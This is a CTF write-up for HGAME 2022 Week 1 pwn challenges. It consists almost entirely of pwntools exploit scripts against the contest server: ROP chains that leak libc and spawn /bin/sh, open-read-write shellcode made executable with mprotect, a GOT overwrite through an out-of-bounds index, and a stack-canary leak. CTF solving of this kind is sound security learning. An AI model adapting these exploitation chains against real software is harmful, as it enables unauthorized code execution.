HGAME 2022 Week1 Pwn
都是简单题,随便写写,没什么好说的。
enter_the_pwn_land
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
#s = process('./a')
s = remote("chuj.top", 30326)
elf = ELF('./a')
libc = ELF('./libc-2.31.so')
pop_rdi_ret = 0x401313
payload = b'a'*0x20
s.sendline(payload)
s.recvuntil("a"*0x20)
libc.address = u64(s.recv(6).ljust(8, b'\x00')) + 0x38f6
info(hex(libc.address))
payload = b'a'*0x28 + p32(1) + p32(0x2c) + b'a'*8 + p64(pop_rdi_ret+1) + p64(pop_rdi_ret) + p64(next(libc.search(b'/bin/sh'))) + p64(libc.sym['system'])
s.sendline(payload)
s.interactive()
enter_the_evil_pwn_land
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
#s = process('./a')
s = remote('chuj.top', 38135)
elf = ELF('./a')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')
payload = b'a'*0x20
s.sendline(payload)
s.recvuntil(b'a'*0x20)
libc.address = u64(s.recv(6).ljust(8,b'\x00')) + 0x38f6
success(hex(libc.address))
pop_rax_ret = libc.address + 0x4a550
pop_rdi_ret = libc.address + 0x26b72
pop_rsi_ret = libc.address + 0x27529
pop_rdx_r12_ret = libc.address + 0x11c371
syscall = libc.sym['syscall'] + 27
payload = b'a'*0x38 + p64(pop_rax_ret) + p64(0x3b) + p64(pop_rdi_ret) + p64(next(libc.search(b'/bin/sh'))) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_r12_ret) + p64(0) + p64(0) + p64(syscall)
payload += b'a'*(0x870-len(payload))
s.sendline(payload)
s.interactive()
oldfashion_orw
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
#s = process('./vuln')
s = remote("chuj.top", 43823)
elf = ELF('./vuln')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')
pop_rdi_ret = 0x401443
pop_rsi_r15_ret = 0x401441
bss_addr = 0x404500
write_plt = elf.plt['write']
write_got = elf.got['write']
s.sendlineafter("size?\n", b'-23333')
payload = b'a'*0x38 + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(write_plt) + p64(0x401311)
s.sendlineafter("content?\n", payload)
libc_base = u64(s.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) - libc.sym['write']
success("libc_base:\t" + hex(libc_base))
s.sendlineafter("size?\n", b'-23333')
pop_rax_ret = libc_base + 0x4a550
pop_rdx_r12_ret = libc_base + 0x11c371
jmp_rax = libc_base + 0x26e91
mprotect_addr = libc_base + libc.sym['mprotect']
read_addr = libc_base + libc.sym['read']
payload = b'a'*0x38
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_r15_ret) + p64(bss_addr) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
payload += p64(read_addr)
payload += p64(pop_rdi_ret) + p64(bss_addr & 0xfff000)
payload += p64(pop_rsi_r15_ret) + p64(0x1000) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(7) + p64(0)
payload += p64(mprotect_addr)
payload += p64(pop_rax_ret) + p64(bss_addr)
payload += p64(jmp_rax)
s.sendline(payload)
shellcode_orw = '''
push 0x2f2e
mov rdi, rsp
mov rax, 2
syscall
mov rdi, 3
mov rsi, rsp
mov rdx, 0x100
mov rax, 217
syscall
mov rdi, 1
mov rsi, rsp
mov rdx, 0x100
mov rax, 1
syscall
push rsp
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall
push 0x401311
ret
'''
s.sendline(asm(shellcode_orw))
s.recvuntil("flag")
flag_name = "flag" + s.recv(20).decode()
success("flag:\t" + flag_name)
leak_addr = u64(s.recvuntil("\x7f")[-6:].ljust(8, b'\x00'))
success("leak_addr:\t" + hex(leak_addr))
leak_addr = leak_addr + 0xa3
s.sendlineafter("size?\n", b'-23333')
payload = b'a'*0x38
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_r15_ret) + p64(bss_addr) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
payload += p64(read_addr)
payload += p64(pop_rax_ret) + p64(bss_addr)
payload += p64(jmp_rax)
s.sendline(payload)
shellcode_orw = f'''
mov rdi, {leak_addr}
mov rsi, 0
mov rax, 2
syscall
mov rdi, 4
mov rsi, {leak_addr}
mov rdx, 0x60
mov rax, 0
syscall
mov rdi, 1
mov rsi, {leak_addr}
mov rdx, 0x60
mov rax, 1
syscall
'''
s.sendline(asm(shellcode_orw))
s.interactive()
spfa
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
#s = process('./spfa')
s = remote("chuj.top", 48872)
elf = ELF('./spfa')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')
s.recvuntil(b'how many datas?\n>> ')
s.sendline(b'4')
s.recvuntil(b'how many nodes?\n>> ')
s.sendline(b'2')
s.recvuntil(b'how many edges?\n>> ')
s.sendline(b'0')
s.recvuntil(b'you want to start from which node?\n>> ')
s.sendline(b'0')
s.recvuntil(b'>> ')
s.sendline(b'-2275')
s.recvuntil(b'the length of the shortest path is ')
elf_base = int(s.recv(15),10) - 0x7008
success('elf_base=>' + hex(elf_base))
s.recvuntil(b'how many nodes?\n>> ')
s.sendline(b'2')
s.recvuntil(b'how many edges?\n>> ')
s.sendline(b'0')
s.recvuntil(b'you want to start from which node?\n>> ')
s.sendline(b'0')
s.recvuntil(b'>> ')
s.sendline(b'-2292')
s.recvuntil(b'the length of the shortest path is ')
libc_base = int(s.recv(15),10) - 0x55410
success('libc_base=>' + hex(libc_base))
strlen_got_addr = libc_base + 0x1eb0a8
dist_addr = elf_base + 0xb720
backdoor = elf_base + 0x16A5
s.recvuntil(b'how many nodes?\n>> ')
s.sendline(b'2')
s.recvuntil(b'how many edges?\n>> ')
s.sendline(b'1')
s.recvuntil(b'format\n')
s.sendline(b'1')
s.sendline(str((strlen_got_addr - dist_addr) // 8))
s.sendline(str(backdoor))
s.recvuntil(b'you want to start from which node?\n>> ')
s.sendline(b'1')
s.recvuntil(b'>> ')
s.sendline(b'pass')
s.interactive()
test_your_gdb
from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
#io = process("./a")
io = remote("chuj.top", 50429)
elf = ELF("./a")
libc = ELF("./libc-2.31.so")
execv = elf.plt['execv']
binsh = 0x408008
pop_rdi = 0x407b53
pop_rsi_r15 = 0x407b51
io.sendafter('pass word\n', p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9))
io.recv(0x18)
canary = u64(io.recv(8))
success("canary:\t" + hex(canary))
payload = b'A' * 0x18 + p64(canary) + b'a'*8 + p64(pop_rdi) + p64(binsh) + p64(pop_rsi_r15) + p64(0) * 2 + p64(execv)
io.sendline(payload)
io.recv()
io.interactive()